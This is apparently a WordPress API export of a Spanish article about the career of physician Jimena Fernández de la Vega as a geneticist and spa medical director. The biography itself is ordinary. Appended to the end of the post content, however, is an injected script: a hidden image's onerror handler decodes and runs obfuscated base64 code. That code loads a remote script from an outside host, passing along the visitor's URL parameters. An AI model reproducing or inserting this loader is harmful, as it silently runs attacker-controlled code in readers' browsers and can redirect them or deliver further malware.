{"id":8120,"date":"2024-04-09T11:25:50","date_gmt":"2024-04-09T14:25:50","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8120"},"modified":"2025-08-13T15:45:08","modified_gmt":"2025-08-13T18:45:08","slug":"jimena-fernandez-de-la-vega-la-primera-medica-hidrologa-del-termalismo-espanol","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8120","title":{"rendered":"JIMENA FERN\u00c1NDEZ DE LA VEGA LA PRIMERA M\u00c9DICA HIDR\u00d3LOGA DEL TERMALISMO ESPA\u00d1OL"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.tribunatermal.com\/blog\/wp-content\/uploads\/2020\/05\/cropped-foto-cabecera-1-1.jpg\" alt=\"\" style=\"width:244px;height:auto\" \/><figcaption class=\"wp-element-caption\"><em>Fuente:<\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4b188a7f939451f90f345ee8b991d75f\" style=\"background-color:#133448\"><em>Por: Rosa Meijide Fa\u00edlde. Catedr\u00e1tica de Hidrolog\u00eda M\u00e9dica, Universidad de A Coru\u00f1a, y Acad\u00e9mica de la R.A. de Medicina de Galicia.<\/em><\/h3>\n\n\n\n<p><strong>Adem\u00e1s de su brillante y pionero papel en el campo de la gen\u00e9tica m\u00e9dica, Jimena Fern\u00e1ndez de la Vega y Lomb\u00e1n merece ser recordada por ser la primera mujer en obtener una plaza por oposici\u00f3n al Cuerpo de M\u00e9dicos Directores de Ba\u00f1os en Espa\u00f1a y ejercer la hidrolog\u00eda m\u00e9dica durante 30 a\u00f1os en algunos de los balnearios m\u00e1s importantes del pa\u00eds.<\/strong><\/p>\n\n\n\n<p>A figura de Jimena Fern\u00e1ndez de la Vega y Lomb\u00e1n (Vegadeo 1895-Santiago de Compostela 1984) ha sido rememorada recientemente por su brillante trayectoria profesional e importante papel en el inicio de la investigaci\u00f3n en el campo de la gen\u00e9tica aplicada a la medicina en Espa\u00f1a. En el libro homenaje, editado por el Consello de Cultura de Galicia y la Real Academia de Ciencias de Galicia, se ha dedicado un cap\u00edtulo a evocar su olvidado papel como m\u00e9dica hidr\u00f3loga que he tenido el placer de escribir. Para ello he recopilado la informaci\u00f3n publicada de esta faceta profesional a la que se dedic\u00f3 desde la finalizaci\u00f3n de la guerra civil espa\u00f1ola cuando comenz\u00f3 en el Balneario de Guitiriz, hasta su jubilaci\u00f3n como directora M\u00e9dica del Balneario de Lanjar\u00f3n, el 30 de mayo de 1970.<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-link-color wp-elements-48a7cd430d934e71f009d6ee9134857f\"><strong><em>Jimena y su formaci\u00f3n m\u00e9dica y cient\u00edfica<\/em><\/strong><br>Jimena Fern\u00e1ndez de la Vega pertenece al incipiente e importante movimiento femenino que, en los albores del siglo XX, comenz\u00f3 a romper barreras y abrir el camino hacia la igualdad educativa y profesional de las mujeres en Espa\u00f1a. Su padre, el m\u00e9dico Wenceslao Fern\u00e1ndez de la Vega Pasar\u00edn, era natural de un pueblo cercano a Lugo y fue director m\u00e9dico del Balneario de Guitiriz desde el a\u00f1o 1904. En la ciudad de Lugo fue donde Jimena curs\u00f3 el bachillerato obteniendo la calificaci\u00f3n de sobresaliente, adem\u00e1s de aprender alem\u00e1n. En el a\u00f1o 1910 se promulg\u00f3 el Real Decreto por el que se regulaba el acceso igualitario a la universidad para ambos sexos y, tres a\u00f1os despu\u00e9s, Jimena junto con su hermana gemela Elisa se matricularon en la Facultad de Medicina. En el a\u00f1o 2019 se cumplieron cien a\u00f1os desde que las hermanas gemelas Jimena y Elisa Fern\u00e1ndez de la Vega y Lomb\u00e1n se convirtieran en las dos primeras mujeres en licenciarse en Medicina en la Universidad de Santiago de Compostela.<br>La brillante carrera profesional de Jimena comienza en Madrid, ciudad a la que se traslada para realizar la tesis doctoral que defender\u00e1 tres a\u00f1os despu\u00e9s. En 1925 y m\u00e1s tarde en 1933, becada por la Junta de Ampliaci\u00f3n de Estudios e Investigaciones cient\u00edficas (JAE), realizar\u00e1 estancias de investigaci\u00f3n en Hamburgo, Viena y G\u00e9nova con las primeras autoridades a nivel mundial en el campo de la gen\u00e9tica, llevando a cabo una importante producci\u00f3n cient\u00edfica y es nombrada en 1933 Jefa de Secci\u00f3n de Gen\u00e9tica y Constituci\u00f3n en la C\u00e1tedra de Patolog\u00eda de la Facultad de Medicina de la Universidad de Madrid, bajo la dependencia de la C\u00e1tedra de N\u00f3voa Santos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/www.tribunatermal.com\/blog\/wp-content\/uploads\/2024\/03\/Catedra-de-Patologia.png?w=615&amp;ssl=1\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><em><sup>Componentes de la C\u00e1tedra de Patolog\u00eda de la Universidad de Madrid con Roberto N\u00f3voa Santos al frente, ocupando Jimena, ya doctora, un lugar destacado a su lado; en el grupo, las m\u00e9dicas internas Azarola y Men\u00e9ndez, y en el laboratorio, las licenciadas Hern\u00e1n y P\u00e9rez del R\u00edo. 1931.<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<p>En las primeras d\u00e9cadas del siglo XX se produjeron importantes avances en la biolog\u00eda, qu\u00edmica y fisiolog\u00eda, adem\u00e1s de la proliferaci\u00f3n de nuevas especialidades dentro de la ciencia m\u00e9dica. Jimena tuvo una formaci\u00f3n en un momento hist\u00f3rico privilegiado en que se llev\u00f3 a cabo un importante cambio de paradigma y, tanto en la licenciatura como en el doctorado, estuvo rodeada de grandes intelectuales seguidores de los \u00faltimos avances de la investigaci\u00f3n mundial y responsables de incorporar a la medicina espa\u00f1ola la moderna ciencia europea, \u201cpor hacer y ense\u00f1ar una medicina rigurosamente instalada en el nivel de su tiempo y dignamente exportable a cualquier parte, algo que desde el siglo XVI no hab\u00eda acontecido en Espa\u00f1a, salvo raras excepciones\u201d seg\u00fan las palabras del Dr. La\u00edn Entralgo. Nombres como Cajal, Mara\u00f1\u00f3n, Jim\u00e9nez D\u00edaz, Pittaluga, Te\u00f3filo Hernando, Pi Su\u00f1er, Lafora, R\u00edo Hortega, N\u00f3voa Santos forjaron la denominada Edad de Plata de nuestra cultura y dieron vida al periodo m\u00e1s floreciente en la historia de la universidad espa\u00f1ola, a\u00fan no superado.<\/p>\n\n\n\n<p>Gregorio Mara\u00f1\u00f3n, uno de los m\u00e1s importantes m\u00e9dicos e intelectuales espa\u00f1oles, edit\u00f3 y prolog\u00f3 en el a\u00f1o 1935 uno de los libros de Jimena, \u201cLa herencia fisiopatol\u00f3gica de la especie humana\u201d dedic\u00e1ndole las siguientes palabras: \u201cFina disc\u00edpula de Pittaluga, de quien recibi\u00f3 la exactitud y la perspicacia que son marchamo de su escuela; y del inolvidable N\u00f3voa Santos, que supo ver, desde el suyo Santiago escondido, los panoramas m\u00e1s vastos de la ciencia universal.\u201d; previamente en otra ocasi\u00f3n escribi\u00f3 de ella: \u201cEs gallega, y esto quiere decir que es aguda, inteligente, y poco dada a dejarse llevar por arrebatos imaginativos. Cualidades excepcionales para el estudio de la ciencia\u201d.<\/p>\n\n\n\n<p>La excelente formaci\u00f3n m\u00e9dica de Jimena ser\u00e1 puesta tambi\u00e9n de manifiesto por el endocrin\u00f3logo italiano Nicola Pende en el informe que certifica la estancia de Jimena en el Istituto di Clinica Medica de G\u00e9nova durante los a\u00f1os 1933-34 llevando a cabo trabajos de investigaci\u00f3n en el campo de la endocrinolog\u00eda y constituci\u00f3n, donde Jimena demostr\u00f3 tener \u00abuna perfecta preparaci\u00f3n para la investigaci\u00f3n cient\u00edfica y grande cultura cl\u00ednica\u00bb, en palabras de N. Pende.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_9-4-2024_11106_www.tribunatermal.com_.jpeg\"><img decoding=\"async\" width=\"700\" height=\"303\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_9-4-2024_11106_www.tribunatermal.com_.jpeg\" alt=\"\" class=\"wp-image-8122\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_9-4-2024_11106_www.tribunatermal.com_.jpeg 700w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_9-4-2024_11106_www.tribunatermal.com_-300x130.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_9-4-2024_11106_www.tribunatermal.com_-696x301.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_9-4-2024_11106_www.tribunatermal.com_-320x139.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_9-4-2024_11106_www.tribunatermal.com_-480x208.jpeg 480w\" sizes=\"(max-width: 700px) 100vw, 700px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup>Jimena en Guitiriz en el a\u00f1o 1953 y vista a\u00e9rea do Balneario de Guitiriz en los a\u00f1os 50.<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<p><strong>Etapa de m\u00e9dica directora de balnearios<\/strong><br>Despu\u00e9s de los duros acontecimientos familiares y profesionales que sufri\u00f3 Jimena en el a\u00f1o 1934, con los fallecimientos repentinos y prematuros de su hermana gemela Elisa y de su maestro Roberto N\u00f3voa Santos, as\u00ed como los tr\u00e1gicos sucesos acontecidos a causa de la Guerra Civil (1936-1939), traslad\u00f3 su residencia a Santiago de Compostela. En el a\u00f1o 1942 dirige el balneario de Catoira (Pontevedra) iniciando as\u00ed su trayectoria profesional c\u00f3mo M\u00e9dica Directora de Balnearios. Esta actividad profesional la compaginar\u00e1 poco despu\u00e9s con la de la Jefatura de Estudios de Herencia y Constituci\u00f3n en la C\u00e1tedra de Patolog\u00eda de la Facultad de Medicina de Madrid, cargo en el que permanecer\u00e1 activa hasta su jubilaci\u00f3n con 71 a\u00f1os en 1966. Durante este periodo escribir\u00e1 el libro \u201cTeor\u00eda de la herencia y herencia molecular\u201d, su \u00faltima obra, siendo directora del Seminario de Gen\u00e9tica, adscrito a la C\u00e1tedra de Patolog\u00eda General, del profesor Bermejillo.<br>La regulaci\u00f3n de la actividad balnearia se inici\u00f3 en Espa\u00f1a con la promulgaci\u00f3n del Real Decreto de 29 de junio de 1816 por el que se creaba la figura de M\u00e9dico Director de Balneario, a la que se acced\u00eda mediante una oposici\u00f3n que permit\u00eda integrarse en el llamado Cuerpo de M\u00e9dicos de Ba\u00f1os. El decreto contemplaba el deber en los balnearios m\u00e1s acreditados de contar con un m\u00e9dico con buena formaci\u00f3n hidrol\u00f3gica, conocimientos que deb\u00edan demostrar en una oposici\u00f3n. La misi\u00f3n de estos m\u00e9dicos era estudiar las aguas mineromedicinales a su cargo, supervisar las instalaciones y atender a los ba\u00f1istas, ocupaciones que hab\u00edan de quedar recogidas en una memoria anual remitida al Ministerio de la Gobernaci\u00f3n.<br>Ser m\u00e9dico de ba\u00f1os supon\u00eda una situaci\u00f3n envidiable dentro de la profesi\u00f3n, pues se trataba de un trabajo estacional de tres meses en la \u00e9poca estival por lo que no interfer\u00eda con el desempe\u00f1o profesional el resto del a\u00f1o. El Cuerpo de M\u00e9dicos de Ba\u00f1os estaba organizado por escalaf\u00f3n y antig\u00fcedad y los m\u00e9dicos escog\u00edan anualmente mediante concurso el balneario a dirigir entre los que hab\u00eda vacantes. Esta instituci\u00f3n constituy\u00f3 un n\u00facleo de profesionales con buena formaci\u00f3n en hidrolog\u00eda y con una actividad cient\u00edfica plasmada en numerosas publicaciones monogr\u00e1ficas y tratados. En su seno se construy\u00f3 la especialidad, se organiz\u00f3 la Sociedad Espa\u00f1ola de Hidrolog\u00eda M\u00e9dica y se institucionaliz\u00f3 a trav\u00e9s de una formaci\u00f3n espec\u00edfica universitaria en la C\u00e1tedra de Hidrolog\u00eda m\u00e9dica de Madrid. Pero habr\u00eda que esperar 129 a\u00f1os para que una mujer se incorporase a este organismo.<br>En el a\u00f1o 1944, a la edad de 49 a\u00f1os, Jimena Fern\u00e1ndez de la Vega oposit\u00f3 al \u201cCuerpo de M\u00e9dicos de Aguas Minero-medicinales e Inspectores de Establecimientos balnearios\u201d consiguiendo el n\u00famero de orden 3 de un total de 50, todos varones, entre los que se encontraban catedr\u00e1ticos de universidad, incluido el de Hidrolog\u00eda M\u00e9dica, el Dr. San Rom\u00e1n y un gran n\u00famero de m\u00e9dicos de prestigio.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Libro-Memoria-1.webp\"><img decoding=\"async\" data-id=\"8123\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Libro-Memoria-1.webp\" alt=\"\" class=\"wp-image-8123\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Fuente-Guitiriz-2.webp\"><img decoding=\"async\" width=\"434\" height=\"277\" data-id=\"8124\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Fuente-Guitiriz-2.webp\" alt=\"\" class=\"wp-image-8124\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Fuente-Guitiriz-2.webp 434w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Fuente-Guitiriz-2-300x191.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Fuente-Guitiriz-2-320x204.webp 320w\" sizes=\"(max-width: 434px) 100vw, 434px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p><em><sup>Portada de la publicaci\u00f3n \u201cMemoria sobre las aguas sulfuroso-fluoradas s\u00f3dicas fr\u00edas y radiactivas de San Juan de Guitiriz (Lugo)\u201d y dedicatoria a su padre. Pabell\u00f3n de la Fuente de San Juan de Guitiriz, edificio en donde Jimena ten\u00eda la consulta.<\/sup><\/em><\/p>\n\n\n\n<p>En 1945, tras la resoluci\u00f3n del concurso para proveer las direcciones m\u00e9dicas de balnearios, Jimena aparece segunda en la orden de preferencia con la asignaci\u00f3n del Balneario de Guitiriz. Habiendo conseguido tan buen n\u00famero en la oposici\u00f3n y pudiendo escoger cualquiera de los balnearios espa\u00f1oles con mayor n\u00famero de enfermos, y mayor remuneraci\u00f3n econ\u00f3mica, es muy probable que en su elecci\u00f3n hab\u00eda pesado el recuerdo de su padre, Wenceslao Fern\u00e1ndez de la Vega Pasar\u00edn, que hab\u00eda ocupado la plaza de M\u00e9dico Director de Guitiriz desde el a\u00f1o 1904 hasta aproximadamente el a\u00f1o 1918.<br>Y seg\u00fan dej\u00f3 escrito el m\u00e9dico, profesor universitario y escritor gallego Luis Rodr\u00edguez Miguez, \u201c\u2026en su elecci\u00f3n de balneario pes\u00f3 tambi\u00e9n su madre, Dolores Lomb\u00e1n, que seg\u00fan sus nietos era una mujer fuerte y valiente excepto los d\u00edas de tormenta, y que el agua de Guitiriz le sentaba muy bien\u201d.<br>El Balneario de Guitiriz, cuyas aguas est\u00e1n indicadas en enfermedades digestivas y de v\u00edas biliares, es considerado uno de los grandes de Galicia, perteneciendo desde sus inicios, a principios del siglo veinte, al grupo de los modernos balnearios junto con Mondariz, La Toja y Cabreiro\u00e1, centros que fueron dise\u00f1ados reproduciendo el modelo europeo de estaciones termales y caracterizados por ser gestionados por empresas modernas. Jimena fue directora m\u00e9dica de Guitiriz ininterrumpidamente desde 1945 hasta 1954.<br>En el a\u00f1o 1950, en el II Congreso Inter-Europeo de Gastro-enterolog\u00eda celebrado en Madrid, presenta la comunicaci\u00f3n \u201cEficacia de las aguas de Guitiriz (Lugo, Espa\u00f1a) en el tratamiento de las colecistopat\u00edas\u201d. En la comunicaci\u00f3n publicada en las actas del congreso con resumen en franc\u00e9s, alem\u00e1n y espa\u00f1ol, expone su experiencia de cinco a\u00f1os en el balneario, en el que cada temporada atiende a 1.100 enfermos de los que el 80% presentan problemas de v\u00edas biliares.<br>El \u00faltimo a\u00f1o que dirigi\u00f3 Guitiriz, Jimena publica la \u201cMemoria sobre las aguas sulfuroso-fluoradas s\u00f3dicas fr\u00edas y radiactivas de San Juan de Guitiriz (Lugo). Nuestra experiencia cl\u00ednica durante nueve a\u00f1os de observaci\u00f3n al frente de su direcci\u00f3n m\u00e9dica balnearia\u201d, que dedica a su padre. La publicaci\u00f3n sigue el modelo de memoria anual con varios apartados: la climatolog\u00eda y caracter\u00edsticas geogr\u00e1ficas de Guitiriz; las infraestructuras del balneario; las caracter\u00edsticas f\u00edsico-qu\u00edmicas del agua mineromedicinal; el an\u00e1lisis biol\u00f3gico de los sedimentos; y un amplio cap\u00edtulo dedicado a explicar los mecanismos de acci\u00f3n de las aguas sulfuradas del balneario y las estad\u00edsticas de los resultados terap\u00e9uticos observados, as\u00ed como el resumen de 25 historias cl\u00ednicas de las principales indicaciones de las aguas de Guitiriz.<br>Durante las temporadas de los a\u00f1os 1955 y 1956 Jimena dirige el Balneario de Montemayor, situado en la v\u00eda de la Plata, en la provincia de C\u00e1ceres. Durante estos a\u00f1os en la direcci\u00f3n m\u00e9dica de Montemayor publica el trabajo titulado \u201cLas aguas sulfurosas en el tratamiento de la Diabetes\u201d en los \u201cAnales Hispanoamericanos de Hidrolog\u00eda M\u00e9dica y Climatolog\u00eda\u201d, publicaci\u00f3n del Instituto de Hidrolog\u00eda m\u00e9dica \u201cAlfonso Lim\u00f3n Montero\u201d del CSIC. En este trabajo detalla su experiencia en el tratamiento de los enfermos diab\u00e9ticos y los efectos sobre la glucemia y la glucosuria de las aguas sulfuradas. Esta publicaci\u00f3n fue tambi\u00e9n presentada a la IV Reuni\u00f3n Nacional de la Sociedad Espa\u00f1ola de Diabetes en 1955.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Jimena-1960-en-Lanjaron.webp\"><img decoding=\"async\" width=\"287\" height=\"445\" data-id=\"8126\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Jimena-1960-en-Lanjaron.webp\" alt=\"\" class=\"wp-image-8126\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Jimena-1960-en-Lanjaron.webp 287w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Jimena-1960-en-Lanjaron-193x300.webp 193w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Jimena-1960-en-Lanjaron-271x420.webp 271w\" sizes=\"(max-width: 287px) 100vw, 287px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Capuchina-Lanjaron-1955.webp\"><img decoding=\"async\" width=\"560\" height=\"424\" data-id=\"8127\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Capuchina-Lanjaron-1955.webp\" alt=\"\" class=\"wp-image-8127\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Capuchina-Lanjaron-1955.webp 560w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Capuchina-Lanjaron-1955-300x227.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Capuchina-Lanjaron-1955-80x60.webp 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Capuchina-Lanjaron-1955-555x420.webp 555w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Capuchina-Lanjaron-1955-320x242.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/04\/Capuchina-Lanjaron-1955-480x363.webp 480w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p><sup><em>Fuente del Manantial Capuchina de Lanjar\u00f3n. 1955.<\/em> <em>Jimena en 1960 en la misma localidad granadina.<\/em><\/sup><\/p>\n\n\n\n<p>En el a\u00f1o 1957 Jimena ocupa el primer puesto en el escalaf\u00f3n de m\u00e9dicos directores de balnearios, accediendo en el concurso anual a la primera direcci\u00f3n del Balneario de Lanjar\u00f3n, en Granada. En este balneario, el de mayor afluencia de ag\u00fcistas de Espa\u00f1a en la \u00e9poca, que ten\u00eda asignados tres directores m\u00e9dicos, ser\u00e1 en el que permanezca m\u00e1s tiempo, hasta mayo del a\u00f1o 1970 en que se jubila tras cumplir 75 a\u00f1os, la edad l\u00edmite que marcaba la normativa para dirigir un establecimiento balneario.<br>Esta extraordinaria mujer, aunque estaba jubilada, continu\u00f3 su actividad. La \u00faltima publicaci\u00f3n en la que nos consta aparece su nombre es en 1972 en la que Concha Su\u00e1rez del Otero publica \u201cConsejos para las se\u00f1oras de cierta edad (ensayos con un poco de humor)\u201d revisados, en su parte m\u00e9dica, por la eminente doctora Jimena Fern\u00e1ndez de la Vega.<br>Seg\u00fan consta en varios textos, Jimena residi\u00f3 en Santiago de Compostela hasta su fallecimiento en mayo de 1984.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/www.tribunatermal.com\/blog\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla-2024-03-04-a-las-12.08.04.png?resize=768%2C415&amp;ssl=1\" alt=\"\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.tribunatermal.com\/blog\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.tribunatermal.com\/blog\/wp-content\/uploads\/2020\/05\/cropped-foto-cabecera-1-1.jpg\" alt=\"\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup>Fuente:<\/sup><\/em><\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Por: Rosa Meijide Fa\u00edlde. Catedr\u00e1tica de Hidrolog\u00eda M\u00e9dica, Universidad de A Coru\u00f1a, y Acad\u00e9mica de la R.A. de Medicina de Galicia. Adem\u00e1s de su brillante y pionero papel en el campo de la gen\u00e9tica m\u00e9dica, Jimena Fern\u00e1ndez de la Vega y Lomb\u00e1n merece ser recordada por ser la primera mujer en obtener una plaza por [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16],"tags":[],"class_list":["post-8120","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-medicina-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8120"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8120\/revisions"}],"predecessor-version":[{"id":10183,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8120\/revisions\/10183"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8128"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}